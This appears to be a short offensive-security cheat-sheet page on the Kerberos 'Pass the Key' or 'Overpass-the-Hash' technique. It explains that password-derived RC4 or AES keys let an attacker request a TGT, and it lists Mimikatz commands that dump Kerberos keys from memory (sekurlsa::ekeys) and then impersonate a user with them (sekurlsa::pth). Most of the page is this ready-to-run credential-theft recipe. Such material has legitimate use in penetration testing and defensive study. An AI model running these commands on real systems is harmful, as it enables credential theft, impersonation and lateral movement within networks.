Skip to main content

Pass The Key

Required Privileges: Administrators

When a User Requests a TGT, they send a Timestamp Encrypted with an Encryption Key derived from their Password.

The Algorithm used to derive this Key can be either DES - RC4 - AES128 - AES256, depending on the installed Windows Version and Kerberos Configuration. If we have any of those Keys, we can ask the KDC for a TGT without requiring the actual Password.


:: Obtaining Kerberos Encryption Keys
privilege::debug
sekurlsa::ekeys

Hash Format

RC4 [Overpass-the-Hash]

When using RC4 the Key will be Equal to the NTLM Hash of a User.

This means that if we could extract the NTLM Hash, we can use it to request a TGT as long as RC4 is one of the Enabled Protocols.


Depending on the Available Keys, we can run the following Commands on Mimikatz.

:: RC4
sekurlsa::pth /user:USERNAME /domain:TARGET /rc4:HASH /run:"Command/PAYLOAD To Run"
:: AES128
sekurlsa::pth /user:USERNAME /domain:TARGET /aes128:HASH /run:"Command/PAYLOAD To Run"
:: AES256
sekurlsa::pth /user:USERNAME /domain:TARGET /aes256:HASH /run:"Command/PAYLOAD To Run"